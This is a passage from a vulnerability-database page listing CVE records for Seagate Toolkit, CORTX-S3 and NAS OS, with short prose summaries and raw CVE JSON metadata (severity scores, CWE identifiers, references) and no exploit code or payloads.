Search
Find a vulnerability
Search criteria
56 vulnerabilities by seagate
CVE-2025-9267 (GCVE-0-2025-9267)
Vulnerability from nvd – Published: 2025-09-26 12:27 – Updated: 2025-09-29 14:37
VLAI
Summary
In Seagate Toolkit on Windows a vulnerability exists in the Toolkit Installer prior to versions 2.35.0.6 where it attempts to load DLLs from the current working directory without validating their origin or integrity. This behavior can be exploited by placing a malicious DLL in the same directory as the installer executable, leading to arbitrary code execution with the privileges of the user running the installer. The issue stems from the use of insecure DLL loading practices, such as relying on relative paths or failing to specify fully qualified paths when invoking system libraries.
Severity
SSVC
Exploitation: none
Automatable: no
Technical Impact: total
CISA Coordinator (v2.0.3)
Assigner
References
Impacted products
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2025-9267",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-09-26T12:54:52.245929Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-09-26T12:54:57.812Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2025-09-29T14:37:53.583Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"url": "https://github.com/Tiger3080/CVE-2025-9267"
}
],
"title": "CVE Program Container",
"x_generator": {
"engine": "ADPogram 0.0.1"
}
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"platforms": [
"Windows"
],
"product": "Toolkit",
"vendor": "Seagate",
"versions": [
{
"lessThan": "2.35.0.6",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
}
],
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "\u003cspan style=\"background-color: rgb(252, 252, 252);\"\u003eIn Seagate Toolkit on Windows a\u0026nbsp;vulnerability exists in the Toolkit Installer prior to\u0026nbsp;versions 2.35.0.6 where it attempts to load DLLs from the current working directory without validating their origin or integrity. This behavior can be exploited by placing a malicious DLL in the same directory as the installer executable, leading to arbitrary code execution with the privileges of the user running the installer. The issue stems from the use of insecure DLL loading practices, such as relying on relative paths or failing to specify fully qualified paths when invoking system libraries.\n\n\u003c/span\u003e\u003cbr\u003e"
}
],
"value": "In Seagate Toolkit on Windows a\u00a0vulnerability exists in the Toolkit Installer prior to\u00a0versions 2.35.0.6 where it attempts to load DLLs from the current working directory without validating their origin or integrity. This behavior can be exploited by placing a malicious DLL in the same directory as the installer executable, leading to arbitrary code execution with the privileges of the user running the installer. The issue stems from the use of insecure DLL loading practices, such as relying on relative paths or failing to specify fully qualified paths when invoking system libraries."
}
],
"impacts": [
{
"capecId": "CAPEC-471",
"descriptions": [
{
"lang": "en",
"value": "CAPEC-471 Search Order Hijacking"
}
]
}
],
"metrics": [
{
"cvssV4_0": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "LOCAL",
"baseScore": 7,
"baseSeverity": "HIGH",
"privilegesRequired": "HIGH",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "PASSIVE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:H/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N",
"version": "4.0",
"vulnAvailabilityImpact": "HIGH",
"vulnConfidentialityImpact": "HIGH",
"vulnIntegrityImpact": "HIGH",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"format": "CVSS",
"scenarios": [
{
"lang": "en",
"value": "GENERAL"
}
]
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-427",
"description": "CWE-427 Uncontrolled Search Path Element",
"lang": "en",
"type": "CWE"
}
]
},
{
"descriptions": [
{
"cweId": "CWE-426",
"description": "CWE-426 Untrusted Search Path",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-09-26T12:27:51.651Z",
"orgId": "c6156efd-4bd0-48d7-8520-680200527478",
"shortName": "Seagate"
},
"references": [
{
"url": "https://www.seagate.com/product-security/#security-advisories"
},
{
"url": "https://www.seagate.com/support/software/toolkit/"
}
],
"source": {
"discovery": "UNKNOWN"
},
"x_generator": {
"engine": "Vulnogram 0.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "c6156efd-4bd0-48d7-8520-680200527478",
"assignerShortName": "Seagate",
"cveId": "CVE-2025-9267",
"datePublished": "2025-09-26T12:27:51.651Z",
"dateReserved": "2025-08-20T14:44:11.379Z",
"dateUpdated": "2025-09-29T14:37:53.583Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2025-9043 (GCVE-0-2025-9043)
Vulnerability from nvd – Published: 2025-08-14 16:27 – Updated: 2025-08-21 14:16
VLAI
Summary
The service executable path in Seagate Toolkit on Versions prior to 2.34.0.33 on Windows allows an attacker with Admin privileges to exploit a vulnerability as classified under CWE-428: Unquoted Search Path or Element. An attacker with write permissions to the root could place a malicious Program.exe file, which would execute with SYSTEM privileges.
Severity
SSVC
Exploitation: none
Automatable: no
Technical Impact: partial
CISA Coordinator (v2.0.3)
CWE
- CWE-428 - Unquoted Search Path or Element
Assigner
References
Impacted products
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2025-9043",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-08-14T18:42:31.162132Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-08-14T19:21:59.342Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2025-08-21T14:16:46.354Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"timeline": [
{
"lang": "en",
"time": "2025-08-21T14:16:46.266Z",
"value": "Previously entered references were removed because they are not applicable to this CVE Record."
}
],
"title": "CVE Program Container",
"x_generator": {
"engine": "ADPogram 0.0.1"
}
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"platforms": [
"Windows"
],
"product": "Toolkit",
"vendor": "Seagate",
"versions": [
{
"lessThan": "2.34.0.33",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
}
],
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "The service executable path in Seagate Toolkit on Versions prior to 2.34.0.33 on Windows allows an attacker with Admin privileges to exploit a vulnerability as classified under CWE-428: Unquoted Search Path or Element. An attacker with write permissions to the root could place a malicious Program.exe file, which would execute with SYSTEM privileges."
}
],
"value": "The service executable path in Seagate Toolkit on Versions prior to 2.34.0.33 on Windows allows an attacker with Admin privileges to exploit a vulnerability as classified under CWE-428: Unquoted Search Path or Element. An attacker with write permissions to the root could place a malicious Program.exe file, which would execute with SYSTEM privileges."
}
],
"metrics": [
{
"cvssV4_0": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "LOCAL",
"baseScore": 6.7,
"baseSeverity": "MEDIUM",
"privilegesRequired": "HIGH",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:H/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N",
"version": "4.0",
"vulnAvailabilityImpact": "NONE",
"vulnConfidentialityImpact": "NONE",
"vulnIntegrityImpact": "HIGH",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"format": "CVSS",
"scenarios": [
{
"lang": "en",
"value": "GENERAL"
}
]
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-428",
"description": "CWE-428 Unquoted Search Path or Element",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-08-21T14:04:46.566Z",
"orgId": "c6156efd-4bd0-48d7-8520-680200527478",
"shortName": "Seagate"
},
"references": [
{
"url": "https://www.seagate.com/support/software/toolkit/"
},
{
"url": "https://www.seagate.com/product-security/#security-advisories"
}
],
"source": {
"discovery": "UNKNOWN"
},
"x_generator": {
"engine": "Vulnogram 0.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "c6156efd-4bd0-48d7-8520-680200527478",
"assignerShortName": "Seagate",
"cveId": "CVE-2025-9043",
"datePublished": "2025-08-14T16:27:05.364Z",
"dateReserved": "2025-08-14T15:57:53.887Z",
"dateUpdated": "2025-08-21T14:16:46.354Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2021-43429 (GCVE-0-2021-43429)
Vulnerability from nvd – Published: 2022-04-07 16:52 – Updated: 2024-08-04 03:55
VLAI
Summary
A Denial of Service vulnerability exists in CORTX-S3 Server as of 11/7/2021 via the mempool_destroy method due to a failture to release locks pool->lock.
Severity
No CVSS data available.
CWE
- n/a
Assigner
References
2 references
| URL | Tags |
|---|---|
| https://github.com/Seagate/cortx-s3server/issues/1037 | x_refsource_MISC |
| https://github.com/Seagate/cortx-s3server/pull/1041 | x_refsource_MISC |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-04T03:55:28.993Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://github.com/Seagate/cortx-s3server/issues/1037"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://github.com/Seagate/cortx-s3server/pull/1041"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "A Denial of Service vulnerability exists in CORTX-S3 Server as of 11/7/2021 via the mempool_destroy method due to a failture to release locks pool-\u003elock."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2022-04-07T16:52:25.000Z",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/Seagate/cortx-s3server/issues/1037"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/Seagate/cortx-s3server/pull/1041"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2021-43429",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "A Denial of Service vulnerability exists in CORTX-S3 Server as of 11/7/2021 via the mempool_destroy method due to a failture to release locks pool-\u003elock."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://github.com/Seagate/cortx-s3server/issues/1037",
"refsource": "MISC",
"url": "https://github.com/Seagate/cortx-s3server/issues/1037"
},
{
"name": "https://github.com/Seagate/cortx-s3server/pull/1041",
"refsource": "MISC",
"url": "https://github.com/Seagate/cortx-s3server/pull/1041"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2021-43429",
"datePublished": "2022-04-07T16:52:25.000Z",
"dateReserved": "2021-11-08T00:00:00.000Z",
"dateUpdated": "2024-08-04T03:55:28.993Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2018-12304 (GCVE-0-2018-12304)
Vulnerability from nvd – Published: 2019-05-13 12:40 – Updated: 2024-08-05 08:30
VLAI
Summary
Cross-site scripting in Application Manager in Seagate NAS OS version 4.3.15.1 allows attackers to execute JavaScript via multiple application metadata fields: Short Description, Publisher Name, Publisher Contact, or Website URL.
Severity
No CVSS data available.
CWE
- n/a
Assigner
References
1 reference
| URL | Tags |
|---|---|
| https://blog.securityevaluators.com/invading-your… | x_refsource_MISC |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-05T08:30:59.997Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://blog.securityevaluators.com/invading-your-personal-cloud-ise-labs-exploits-the-seagate-stcr3000101-ecf89de2170"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Cross-site scripting in Application Manager in Seagate NAS OS version 4.3.15.1 allows attackers to execute JavaScript via multiple application metadata fields: Short Description, Publisher Name, Publisher Contact, or Website URL."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2019-05-13T12:40:24.000Z",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "https://blog.securityevaluators.com/invading-your-personal-cloud-ise-labs-exploits-the-seagate-stcr3000101-ecf89de2170"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2018-12304",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Cross-site scripting in Application Manager in Seagate NAS OS version 4.3.15.1 allows attackers to execute JavaScript via multiple application metadata fields: Short Description, Publisher Name, Publisher Contact, or Website URL."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://blog.securityevaluators.com/invading-your-personal-cloud-ise-labs-exploits-the-seagate-stcr3000101-ecf89de2170",
"refsource": "MISC",
"url": "https://blog.securityevaluators.com/invading-your-personal-cloud-ise-labs-exploits-the-seagate-stcr3000101-ecf89de2170"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2018-12304",
"datePublished": "2019-05-13T12:40:24.000Z",
"dateReserved": "2018-06-13T00:00:00.000Z",
"dateUpdated": "2024-08-05T08:30:59.997Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2018-12303 (GCVE-0-2018-12303)
Vulnerability from nvd – Published: 2019-05-13 12:39 – Updated: 2024-08-05 08:30
VLAI
Summary
Cross-site scripting in filebrowser in Seagate NAS OS version 4.3.15.1 allows attackers to execute JavaScript via directory names.
Severity
No CVSS data available.
CWE
- n/a
Assigner
References
1 reference
| URL | Tags |
|---|---|
| https://blog.securityevaluators.com/invading-your… | x_refsource_MISC |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-05T08:30:59.697Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://blog.securityevaluators.com/invading-your-personal-cloud-ise-labs-exploits-the-seagate-stcr3000101-ecf89de2170"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Cross-site scripting in filebrowser in Seagate NAS OS version 4.3.15.1 allows attackers to execute JavaScript via directory names."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2019-05-13T12:39:37.000Z",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "https://blog.securityevaluators.com/invading-your-personal-cloud-ise-labs-exploits-the-seagate-stcr3000101-ecf89de2170"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2018-12303",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Cross-site scripting in filebrowser in Seagate NAS OS version 4.3.15.1 allows attackers to execute JavaScript via directory names."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://blog.securityevaluators.com/invading-your-personal-cloud-ise-labs-exploits-the-seagate-stcr3000101-ecf89de2170",
"refsource": "MISC",
"url": "https://blog.securityevaluators.com/invading-your-personal-cloud-ise-labs-exploits-the-seagate-stcr3000101-ecf89de2170"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2018-12303",
"datePublished": "2019-05-13T12:39:37.000Z",
"dateReserved": "2018-06-13T00:00:00.000Z",
"dateUpdated": "2024-08-05T08:30:59.697Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2018-12302 (GCVE-0-2018-12302)
Vulnerability from nvd – Published: 2019-05-13 12:38 – Updated: 2024-08-05 08:30
VLAI
Summary
Missing HTTPOnly flag on session cookies in the Seagate NAS OS version 4.3.15.1 web application allows attackers to steal session tokens via cross-site scripting.
Severity
No CVSS data available.
CWE
- n/a
Assigner
References
1 reference
| URL | Tags |
|---|---|
| https://blog.securityevaluators.com/invading-your… | x_refsource_MISC |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-05T08:30:59.775Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://blog.securityevaluators.com/invading-your-personal-cloud-ise-labs-exploits-the-seagate-stcr3000101-ecf89de2170"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Missing HTTPOnly flag on session cookies in the Seagate NAS OS version 4.3.15.1 web application allows attackers to steal session tokens via cross-site scripting."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2019-05-13T12:38:56.000Z",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "https://blog.securityevaluators.com/invading-your-personal-cloud-ise-labs-exploits-the-seagate-stcr3000101-ecf89de2170"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2018-12302",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Missing HTTPOnly flag on session cookies in the Seagate NAS OS version 4.3.15.1 web application allows attackers to steal session tokens via cross-site scripting."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://blog.securityevaluators.com/invading-your-personal-cloud-ise-labs-exploits-the-seagate-stcr3000101-ecf89de2170",
"refsource": "MISC",
"url": "https://blog.securityevaluators.com/invading-your-personal-cloud-ise-labs-exploits-the-seagate-stcr3000101-ecf89de2170"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2018-12302",
"datePublished": "2019-05-13T12:38:56.000Z",
"dateReserved": "2018-06-13T00:00:00.000Z",
"dateUpdated": "2024-08-05T08:30:59.775Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2018-12301 (GCVE-0-2018-12301)
Vulnerability from nvd – Published: 2019-05-13 12:38 – Updated: 2024-08-05 08:30
VLAI
Summary
Unvalidated URL in Download Manager in Seagate NAS OS version 4.3.15.1 allows attackers to access the loopback interface via a Download URL of 127.0.0.1 or localhost.
Severity
No CVSS data available.
CWE
- n/a
Assigner
References
1 reference
| URL | Tags |
|---|---|
| https://blog.securityevaluators.com/invading-your… | x_refsource_MISC |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-05T08:30:59.985Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://blog.securityevaluators.com/invading-your-personal-cloud-ise-labs-exploits-the-seagate-stcr3000101-ecf89de2170"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Unvalidated URL in Download Manager in Seagate NAS OS version 4.3.15.1 allows attackers to access the loopback interface via a Download URL of 127.0.0.1 or localhost."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2019-05-13T12:38:07.000Z",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "https://blog.securityevaluators.com/invading-your-personal-cloud-ise-labs-exploits-the-seagate-stcr3000101-ecf89de2170"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2018-12301",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Unvalidated URL in Download Manager in Seagate NAS OS version 4.3.15.1 allows attackers to access the loopback interface via a Download URL of 127.0.0.1 or localhost."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://blog.securityevaluators.com/invading-your-personal-cloud-ise-labs-exploits-the-seagate-stcr3000101-ecf89de2170",
"refsource": "MISC",
"url": "https://blog.securityevaluators.com/invading-your-personal-cloud-ise-labs-exploits-the-seagate-stcr3000101-ecf89de2170"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2018-12301",
"datePublished": "2019-05-13T12:38:07.000Z",
"dateReserved": "2018-06-13T00:00:00.000Z",
"dateUpdated": "2024-08-05T08:30:59.985Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2018-12300 (GCVE-0-2018-12300)
Vulnerability from nvd – Published: 2019-05-13 12:36 – Updated: 2024-08-05 08:30
VLAI
Summary
Arbitrary Redirect in echo-server.html in Seagate NAS OS version 4.3.15.1 allows attackers to disclose information in the Referer header via the 'state' URL parameter.
Severity
No CVSS data available.
CWE
- n/a
Assigner
References
1 reference
| URL | Tags |
|---|---|
| https://blog.securityevaluators.com/invading-your… | x_refsource_MISC |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-05T08:30:59.824Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://blog.securityevaluators.com/invading-your-personal-cloud-ise-labs-exploits-the-seagate-stcr3000101-ecf89de2170"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Arbitrary Redirect in echo-server.html in Seagate NAS OS version 4.3.15.1 allows attackers to disclose information in the Referer header via the \u0027state\u0027 URL parameter."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2019-05-13T12:36:58.000Z",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "https://blog.securityevaluators.com/invading-your-personal-cloud-ise-labs-exploits-the-seagate-stcr3000101-ecf89de2170"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2018-12300",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Arbitrary Redirect in echo-server.html in Seagate NAS OS version 4.3.15.1 allows attackers to disclose information in the Referer header via the \u0027state\u0027 URL parameter."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://blog.securityevaluators.com/invading-your-personal-cloud-ise-labs-exploits-the-seagate-stcr3000101-ecf89de2170",
"refsource": "MISC",
"url": "https://blog.securityevaluators.com/invading-your-personal-cloud-ise-labs-exploits-the-seagate-stcr3000101-ecf89de2170"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2018-12300",
"datePublished": "2019-05-13T12:36:58.000Z",
"dateReserved": "2018-06-13T00:00:00.000Z",
"dateUpdated": "2024-08-05T08:30:59.824Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2018-12299 (GCVE-0-2018-12299)
Vulnerability from nvd – Published: 2019-05-13 12:35 – Updated: 2024-08-05 08:30
VLAI
Summary
Cross-site scripting in filebrowser in Seagate NAS OS version 4.3.15.1 allows attackers to execute JavaScript via uploaded file names.
Severity
No CVSS data available.
CWE
- n/a
Assigner
References
1 reference
| URL | Tags |
|---|---|
| https://blog.securityevaluators.com/invading-your… | x_refsource_MISC |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-05T08:30:59.654Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://blog.securityevaluators.com/invading-your-personal-cloud-ise-labs-exploits-the-seagate-stcr3000101-ecf89de2170"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Cross-site scripting in filebrowser in Seagate NAS OS version 4.3.15.1 allows attackers to execute JavaScript via uploaded file names."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2019-05-13T12:35:33.000Z",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
